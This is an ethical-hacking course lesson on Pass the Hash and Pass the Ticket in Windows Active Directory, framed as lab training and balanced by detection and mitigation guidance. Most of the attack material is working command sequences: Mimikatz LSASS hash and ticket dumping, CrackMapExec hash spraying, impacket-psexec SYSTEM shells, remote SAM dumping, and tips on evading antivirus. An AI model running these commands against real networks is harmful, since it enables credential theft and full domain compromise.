⚠️ Authorised Lab Use Only: Pass the Hash and Pass the Ticket techniques involve credential theft and lateral movement. Practice exclusively in your own isolated lab environment (Metasploitable, HackTheBox, TryHackMe) or with explicit written client authorisation during a sanctioned penetration test. Performing these attacks on networks you do not own is a criminal offence.
Pass the Hash and Pass the Ticket are the two lateral movement techniques that can turn a single compromised Windows workstation into full domain control. You do not crack passwords. You do not brute force anything. You take the authentication material the Windows operating system already holds in memory, NTLM hashes and Kerberos tickets, and reuse it to authenticate as that user everywhere in the network. This is the moment where a real penetration test stops being theoretical and becomes a complete domain takeover, and today you are going to learn exactly how it works.
🎯 What You’ll Master in Day 26
Understand why NTLM hashes and Kerberos tickets can be reused without cracking
Extract NTLM hashes from LSASS memory using Mimikatz in a lab environment
Perform Pass the Hash with CrackMapExec and Impacket against Windows targets
Extract and inject Kerberos tickets for Pass the Ticket attacks
Understand detection methods and how defenders protect against these attacks
⏱️ 58 min read · 3 hands-on exercises
📊 Where are you with Active Directory attacks?
✅ This guide builds from conceptual foundations through hands-on techniques. If you completed Days 23–25, you have the AD context needed for everything here. If AD is new — start with the conceptual section before touching any tools.
Pass the Hash and Pass the Ticket: Why Windows Authentication Is the Vulnerability
To understand Pass the Hash, you need to understand how NTLM authentication works. When a Windows client authenticates to a network resource with NTLM, neither the plaintext password nor the hash crosses the wire. The server sends an 8-byte random challenge; the client computes a response from that challenge using the NT hash of the password (MD4 of the UTF-16LE password) as the key; the server, or the domain controller on its behalf, recomputes the same response from its stored copy of the hash and compares. The NT hash is the only secret in that computation, so whoever holds it can produce a valid response without ever knowing the password. That is why, in NTLM's model, the hash is functionally equivalent to the password.
Windows keeps the NT hashes of logged-on users in the memory of the Local Security Authority Subsystem Service (LSASS) process so that it can answer challenges on the user's behalf (single sign-on). A process running as SYSTEM, or as a local administrator that has enabled SeDebugPrivilege, can open LSASS and read those hashes out, unless Credential Guard or LSA protection (RunAsPPL) is in place. Once you have a hash, you can authenticate to any service that accepts NTLM as that user, without ever knowing or cracking the plaintext password.
Pass the Ticket works on the same principle but for Kerberos. When a user authenticates in an Active Directory environment, Windows caches their Kerberos tickets, the Ticket Granting Ticket (TGT) and service tickets, together with the session keys needed to use them, in LSASS. Extracting those tickets and injecting them into another logon session lets you authenticate as that user to any Kerberos-protected service for as long as the ticket is valid (a TGT is typically good for 10 hours and renewable for up to 7 days).
PtH vs PtT — Attack Flow Comparison
PASS THE HASH (NTLM)
1. Compromise machine
2. Dump LSASS → get NTLM hash
3. Auth with hash (no crack needed)
4. Access SMB, WMI, WinRM
Protocol: NTLM
PASS THE TICKET (KERBEROS)
1. Compromise machine
2. Dump Kerberos tickets from memory
3. Inject ticket into new session
4. Access AD services as victim user
Protocol: Kerberos
📸 Pass the Hash vs Pass the Ticket — both techniques reuse authentication material from memory without cracking, targeting NTLM and Kerberos protocols respectively.
🧠 EXERCISE 1 — THINK LIKE A HACKER (10 MIN · NO TOOLS)
Why Resetting a Compromised User’s Password Does Not Stop Pass the Hash
⏱️ Time: 10 minutes · No tools required
Scenario: An incident response team detects that user “jsmith” has been
compromised. They immediately reset jsmith’s password. They believe the
threat is contained.
Think through these questions:
1. If the attacker already extracted jsmith’s NTLM hash from LSASS
before the password reset, can they still authenticate as jsmith?
Why or why not?
2. The attacker used jsmith’s access to compromise “administrator” on
a second machine and extracted that hash too. Does resetting jsmith’s
password help with the administrator account?
3. If the attacker has a valid Kerberos TGT for jsmith with 8 hours
remaining, and jsmith’s password is reset, can they still use that
ticket? (Hint: think about how ticket revocation works in Kerberos)
4. What should the incident response team do BEYOND just resetting
the password to actually contain a PtH/PtT compromise?
✅ What you just learned: Resetting a compromised password invalidates the old NT hash for new NTLM authentications once the reset reaches the domain controllers, but it does nothing about the access the attacker already obtained with it, and nothing about the other hashes they harvested along the way. Kerberos tickets already issued to the attacker stay valid until they expire (10 hours for a TGT, longer if renewed); a user password reset does not revoke them, because tickets are encrypted with the KRBTGT account's key, not the user's. A real containment response therefore requires: isolating the compromised machines, rotating the KRBTGT key twice (which invalidates all existing tickets; wait for AD replication and for the 10-hour TGT lifetime to pass before the second reset, or you will break authentication domain-wide), and forcing password resets on ALL accounts that authenticated to compromised machines, not just the initially-breached account. This is why lateral movement makes incident response exponentially harder.
📸 Write your analysis and share in #day-26-pth on Discord.
Extracting NTLM Hashes From LSASS Memory With Mimikatz
Mimikatz is the tool that changed Active Directory security forever. Written by Benjamin Delpy, it demonstrated that Windows stores authentication credentials in memory in a recoverable form, a consequence of single sign-on that had not been widely appreciated before. Today nearly every penetration tester uses Mimikatz or one of its embedded ports (Metasploit's kiwi extension, Cobalt Strike, and other frameworks) for credential extraction.
# Run from an elevated (Administrator) prompt on the compromised host
privilege::debug
# Dump every logon session's credentials from LSASS memory
sekurlsa::logonpasswords
# Each session lists Username, Domain and an NTLM line: that NT hash is the one you use
# (LM hashes are not stored by default on modern Windows; tools print the empty-LM value instead)
# Alternative: dump the local SAM database (local account hashes only; run as SYSTEM)
lsadump::sam
# Extract Kerberos tickets as well
sekurlsa::tickets /export
⚠️ AV and EDR Detection: Mimikatz is detected by virtually every antivirus and EDR solution, both by signature and by behaviour (any non-system process opening a read handle to LSASS is an alert in its own right). In real engagements, penetration testers use obfuscated builds, in-memory execution via Metasploit's kiwi extension, or tools such as pypykatz (a Python implementation that can also parse a saved LSASS dump offline) to reduce the footprint. For lab practice, disable Windows Defender before running Mimikatz; on a real engagement, document any such change and revert it.
NTLM Hash Lateral Movement — CrackMapExec and Impacket in Practice
Once you have an NTLM hash, CrackMapExec (now maintained as NetExec, invoked as nxc with the same syntax) is the fastest way to find out which hosts accept it. It sprays the hash across an entire subnet over SMB and reports which machines it can authenticate to, and on which of those the account is a local administrator (marked Pwn3d!), in seconds across hundreds of hosts. For a local account such as the built-in Administrator, add --local-auth so the logon is attempted against each host's SAM rather than the domain.
PASS THE HASH — CRACKMAPEXEC AND IMPACKET
# CrackMapExec — test hash against entire subnet via SMB
crackmapexec smb [subnet] -u [user] -H [nt-hash]
# Add --local-auth when the account is a local (SAM) account rather than a domain account
crackmapexec smb [subnet] -u Administrator -H [nt-hash] --local-auth
# Hosts that print (Pwn3d!) accept the hash with admin rights; open a SYSTEM shell on one
impacket-psexec [user]@[target-ip] -hashes :[nt-hash]
# Same hash over WinRM when the SMB admin shares are blocked
evil-winrm -i [target-ip] -u [user] -H [nt-hash]
Kerberos Ticket Extraction — Stealing TGTs and Service Tickets
Kerberos tickets in memory represent active authenticated sessions. A TGT (Ticket Granting Ticket) allows you to request new service tickets for any service the user has access to — meaning a stolen TGT is effectively a full user session. Service tickets are more limited but allow access to a specific service without needing to contact the KDC again.
KERBEROS TICKET EXTRACTION WITH MIMIKATZ
# List all Kerberos tickets in current session
kerberos::list
# Export all tickets to .kirbi files in current directory
kerberos::list /export
[00000000] – 0x00000012 – aes256_hmac
Start/End/MaxRenew: [date range]
Server Name : krbtgt/CORP @ CORP.LOCAL
Client Name : jsmith @ CORP.LOCAL
Saved to file : 1-40e10000-jsmith@krbtgt~CORP-CORP.LOCAL.kirbi
# Alternative: use Rubeus (C# Kerberos toolkit) for stealthier extraction
Rubeus.exe dump /nowrap
# Export tickets from every logon session on the host, not just your own (needs privilege::debug or SYSTEM)
sekurlsa::tickets /export
Pass the Ticket Kerberos — Injecting Stolen Tickets for Service Access
With a .kirbi file in hand, you can inject it into a logon session on any machine, including one that has never authenticated as that user; Mimikatz does this with kerberos::ptt, and Rubeus with its ptt action. The target service honours the ticket because it was issued and encrypted by the legitimate KDC, and the .kirbi (a KRB-CRED structure) carries the session key needed to use it. A stolen TGT lets you request service tickets for anything the user can reach; a stolen service ticket only works against the service it names. The ticket is bound to the client name inside it, so you act as that user for the rest of its lifetime regardless of what happens to the account's password. This is particularly powerful when the stolen ticket belongs to a highly privileged service account. The injected ticket lives only in the logon session you injected it into; check with klist before using it.
🧪 EXERCISE 2 — TRYHACKME LAB
Pass the Hash With CrackMapExec and Impacket in the TryHackMe “Attacking Kerberos” Room
Step 1: Go to tryhackme.com and search for “Attacking Kerberos”
(free room — no subscription required)
Step 2: Read through Task 1-3 to understand the lab environment
(Windows Server with AD configured)
Step 3: Deploy the machine and connect via the TryHackMe VPN or
AttackBox
Step 4: Follow the Pass the Hash section using the pre-provided
NTLM hashes and CrackMapExec:
crackmapexec smb [target-ip] -u [user] -H [hash]
Step 5: Note which hosts return “(Pwn3d!)” — these accept the hash
Step 6: Open a shell on one of the vulnerable hosts using:
impacket-psexec [user]@[target] -hashes :[hash]
Step 7: From within the shell, run:
whoami
hostname
ipconfig
Step 8: Document: how many hosts accepted the same hash?
What does this tell you about password reuse in the environment?
✅ What you just learned: In real AD environments, local administrator passwords are often identical across all machines — a legacy of poor configuration management. When you find one machine’s administrator hash, CrackMapExec will frequently show you 5, 10, or 50 machines accepting the same credential. This is the “pass the hash spray” pattern that turns a single workstation compromise into full network access. The finding is so common it has a name: local administrator password reuse, and it is one of the most prevalent misconfigurations in enterprise Windows environments.
📸 Screenshot the CrackMapExec output showing Pwn3d! hosts and share in #day-26-pth on Discord.
How Defenders Detect PtH and PtT — And Why It Matters to You
As an ethical hacker, understanding detection is not just academic — it tells you how to write better findings in your reports, how to advise clients on remediation, and how to operate more stealthily during authorised engagements. Modern SOC teams actively hunt for PtH and PtT patterns.
Windows Event IDs to know: Event 4624 (successful logon) with Logon Type 3 (network) and authentication package NTLM is the record a PtH logon leaves on the target. On its own it is noisy, because every legacy SMB connection looks the same, so hunt for the pattern instead: one source address authenticating as the same account, especially a local account such as Administrator, to many hosts in a short window. Event 4776 on the domain controller records NTLM credential validation for domain accounts. On the attacker's source host, Mimikatz's sekurlsa::pth leaves a 4624 with Logon Type 9 (NewCredentials) and logon process seclogo. Event 4648 flags explicit credential use. Event 4688 with process name mimikatz.exe is an obvious alert, and just as obviously evaded by renaming the binary, which is why EDR products alert on the behaviour instead: any non-system process opening a read handle to LSASS.
Mitigations clients should implement: Local Administrator Password Solution (LAPS), which sets a unique, randomised local administrator password on every machine and so removes the cross-machine reuse that makes a local-admin hash spray work (domain account hashes are unaffected, so LAPS is necessary but not sufficient). The Protected Users security group, which stops member accounts from authenticating with NTLM, from having their credentials cached, and from being delegated, and shortens their TGT lifetime to 4 hours; put privileged human accounts in it, never service accounts without testing. Credential Guard, which moves NT hashes and Kerberos keys into a virtualisation-based isolated process (LSAIso) that Mimikatz cannot read; it does not protect local SAM accounts and does not stop an attacker who already controls a session from using that session's cached tickets, so pair it with LAPS and LSA protection (RunAsPPL).
⚡ EXERCISE 3 — KALI TERMINAL (30 MIN)
Perform Pass the Hash With Impacket Against Metasploitable/Windows Lab
⏱️ Time: 30 minutes · Kali Linux + Windows lab VM required (HackTheBox or TryHackMe acceptable)
PtH WITH IMPACKET — FULL WORKFLOW
# Step 1: Assume you have extracted this hash from a previous compromise:
#   [user]:[rid]:aad3b435b51404eeaad3b435b51404ee:[nt-hash]:::   (secretsdump/pwdump format; the last 32 hex characters are the NT hash)
# Step 2: Spray the hash across the lab subnet over SMB and note every host that prints (Pwn3d!)
crackmapexec smb [subnet] -u [user] -H [nt-hash] --local-auth
# Step 3: Open a SYSTEM shell on one of those hosts and confirm who and where you are
impacket-psexec [user]@[target-ip] -hashes :[nt-hash]
whoami
hostname
# Step 4: Dump the SAM on every host that accepted the hash; each new NT hash feeds the next sweep
impacket-secretsdump [user]@[target-ip] -hashes :[nt-hash]
# Step 5: Repeat Step 2 with each new hash until no further host accepts any of them
# Alternative shell when the SMB admin shares are blocked but WinRM (5985) is open:
evil-winrm -i [target-ip] -u [user] -H [nt-hash]
✅ What you just learned: This is the hash spray cascade — one compromised machine yields hashes, each hash unlocks more machines, each new machine yields more hashes. This compounding lateral movement is why a single unpatched or misconfigured endpoint in an AD environment can lead to full domain compromise within hours. The impacket-secretsdump step is the key: it dumps the SAM database remotely, giving you all local account hashes on every machine you can authenticate to — feeding the next CrackMapExec sweep.
📸 Screenshot the shell prompt showing whoami output after successful PtH and share in #day-26-pth on Discord. Tag #lateralmovement2026
🧠 QUICK CHECK — Day 26
You extract an NTLM hash from a compromised workstation. The user’s account password is 32 characters long and would take millions of years to crack. What is the most efficient use of this hash?
📋 Commands Used Today — Day 26 Reference Card
privilege::debug · Mimikatz · enable SeDebugPrivilege to access LSASS memory
sekurlsa::logonpasswords · Mimikatz · dump all logon credentials and NTLM hashes from LSASS
sekurlsa::tickets /export · Mimikatz · export all Kerberos tickets to .kirbi files
kerberos::ptt [file.kirbi] · Mimikatz · inject a stolen Kerberos ticket into the current session
crackmapexec smb SUBNET -u USER -H HASH · CrackMapExec/NetExec · test an NTLM hash against all hosts in a subnet via SMB (add --local-auth for local accounts)
impacket-psexec USER@IP -hashes :NTHASH · Impacket · open a SYSTEM shell on a remote Windows host using the NTLM hash
impacket-secretsdump USER@IP -hashes :NTHASH · Impacket · dump the SAM database remotely (all local account hashes)
evil-winrm -i IP -u USER -H NTHASH · Evil-WinRM · WinRM shell via hash; useful when SMB is blocked
🏆 Mark Day 26 as Complete
You now understand the technique that turns single workstation access into full domain compromise. Pass the Hash and Pass the Ticket are in every professional penetration tester’s toolkit for exactly one reason: they work, consistently, in real enterprise environments.
❓ Frequently Asked Questions
What is the difference between Pass the Hash and Pass the Ticket?
Pass the Hash exploits NTLM authentication — you use a stolen NTLM hash to authenticate without cracking it. Pass the Ticket exploits Kerberos — you steal a Kerberos ticket from memory and inject it into a new session. PtH works against NTLM-protected services. PtT works against Kerberos-protected services, which is the default in Active Directory environments.
Do I need the plaintext password to perform Pass the Hash?
No — this is the core insight. Windows NTLM authentication uses the hash directly as the credential. The hash IS the password in NTLM’s model. You never need to crack it. This is why hash exposure is treated as a full credential compromise in AD environments.
Which tools perform Pass the Hash attacks?
The primary tools are: Mimikatz (hash extraction), CrackMapExec / NetExec (mass PtH testing across subnets), the Impacket suite (psexec, wmiexec, smbexec with the -hashes flag), Evil-WinRM (WinRM shell with hash auth), and Metasploit's psexec module. CrackMapExec is the most efficient for identifying which hosts accept a hash across an entire network.
How do defenders detect Pass the Hash attacks?
Security teams detect PtH via Windows Event ID 4624 with Logon Type 3 and NTLM authentication, combined with Event 4776. Abnormal lateral movement patterns trigger SIEM alerts. EDR solutions detect Mimikatz’s LSASS access directly. LAPS (Local Administrator Password Solution) eliminates hash reuse by assigning unique passwords to every machine.
What privileges are required to extract hashes with Mimikatz?
Mimikatz requires SYSTEM privileges, or local Administrator rights with SeDebugPrivilege enabled, to read LSASS memory, and Credential Guard or LSA protection can block it even then. You typically need to have compromised a local admin account on the host first. This is why privilege escalation on the first host almost always precedes lateral movement in a real engagement.
What comes after Pass the Hash and Ticket in this course?
Day 27 covers BloodHound — the AD attack path visualisation tool that maps relationships between users, groups, and computers to automatically identify the shortest path to Domain Admin. After learning manual lateral movement today, BloodHound automates attack path discovery across complex environments.
BloodHound Tutorial 2026 — Day 27 shows how to map all AD attack paths visually, using the lateral movement techniques from today as the edges in the BloodHound graph.
100-Day Ethical Hacking Course Hub — The complete course index covering every day from Linux basics through advanced AD attacks and red team operations.
Mimikatz GitHub Repository — The official Mimikatz source and documentation from Benjamin Delpy, covering all modules and their underlying Windows authentication exploitation techniques.
Hacking Articles — Pass the Hash Deep Dive — Comprehensive walkthrough of PtH variations including WMI, SMB, and RDP authentication bypass techniques with lab screenshots.
ME
Mr Elite
Owner, SecurityElites.com
On one of the most memorable engagements of my career, I compromised a single developer’s laptop through a phishing simulation. The machine had Credential Guard disabled — a policy gap. Mimikatz pulled three NTLM hashes. CrackMapExec swept the 192.168.1.0/24 subnet with each hash in under two minutes. Fourteen machines returned Pwn3d! — the IT helpdesk admin’s hash was the local administrator on every workstation in the office. From one developer laptop to full domain admin took 47 minutes. The client’s CISO was in the debrief room and genuinely went pale. That 47-minute number is in three separate board presentations that clients have sent me since. Lateral movement is not theoretical. It is Tuesday afternoon in most enterprise networks.